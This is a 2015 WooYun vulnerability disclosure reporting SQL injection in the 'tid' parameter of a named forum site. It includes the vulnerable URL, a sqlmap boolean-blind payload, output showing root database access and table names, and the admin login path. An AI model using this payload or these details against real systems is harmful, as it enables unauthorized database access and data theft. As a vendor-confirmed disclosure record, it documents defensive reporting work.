当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137232

漏洞标题:好老师联盟某站sql注入(root权限)

相关厂商:hlslm.cn

漏洞作者: 日出东方

提交时间:2015-08-27 09:10

修复时间:2015-10-11 14:04

公开时间:2015-10-11 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-27: 细节已通知厂商并且等待厂商处理中
2015-08-27: 厂商已经确认,细节仅向厂商公开
2015-09-06: 细节向核心白帽子及相关领域专家公开
2015-09-16: 细节向普通白帽子公开
2015-09-26: 细节向实习白帽子公开
2015-10-11: 细节向公众公开

简要描述:

详细说明:

http://www.jzq001.com/forum.php?mod=viewthread&tid=45865&extra=page%253D1&page=1
参数 tid
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: mod=viewthread&tid=(SELECT (CASE WHEN (2141=2141) THEN 2141 ELSE 21
41*(SELECT 2141 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&extra=page%3D1&pag
e=1
---
[22:05:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
current database: 'bbs_52qiuxue'
current user: 'root@localhost'
465 张表
[22:09:22] [INFO] retrieved: 465
[22:09:30] [INFO] retrieved: pre_access
[22:10:12] [INFO] retrieved: pre_active_active_zh
[22:11:26] [INFO] retrieved: pre_active_changeusername
[22:12:40] [INFO] retrieved: pre_active_city_website_hooks
[22:14:14] [INFO] retrieved: pre_active_city_website_push_log
[22:15:10] [INFO] retrieved: pre_active_city_website_setting
[22:15:53] [INFO] retrieved: pre_active_lottery_chance_zh
[22:17:14] [INFO] retrieved: pre_active_lottery_line_zh
[22:18:01] [INFO] retrieved: pre_active_lottery_zh
[22:18:27] [INFO] retrieved: pre_active_questionnaire
[22:19:35] [INFO] retrieved: pre_active_questionnaire_users
[22:20:23] [INFO] retrieved: pre_active_share_qq_log
[22:21:22] [INFO] retrieved: pre_amy_user_setting
[22:22:24] [INFO] retrieved: pre_appbyme_config
[22:23:30] [INFO] retrieved: pre_appbyme_portal_module
[22:24:30] [INFO] retrieved: pre_appbyme_portal_module_source
[22:25:13] [INFO] retrieved: pre_appbyme_user_setting
[22:22:24] [INFO] retrieved: pre_appbyme_config
[22:23:30] [INFO] retrieved: pre_appbyme_portal_module
[22:24:30] [INFO] retrieved: pre_appbyme_portal_module_source
[22:25:13] [INFO] retrieved: pre_appbyme_user_setting
[22:26:19] [INFO] retrieved: pre_article
[22:26:54] [INFO] retrieved: pre_baidusubmit_setting
[22:28:19] [INFO] retrieved: pre_baidusubmit_sitemap
[22:28:53] [INFO] retrieved: pre_baidusubmit_urlstat
[22:29:29] [INFO] retrieved: pre_class
[22:29:58] [INFO] retrieved: pre_common_admincp_cmenu
[22:31:07] [INFO] retrieved: pre_common_admincp_group
马上熄灯了
随便看个数据。。。。
Database: bbs_52qiuxue
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| pre_active_changeusername | 616 |
+---------------------------+---------+
后台地址,有时间的话进后台应该没问题
http://www.jzq001.com//admin.php?
祝审核管理员长命百岁,给个首页如何?

漏洞证明:

11

修复方案:

11

版权声明:转载请注明来源 日出东方@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-27 14:03

厂商回复:

thanks

最新状态:

暂无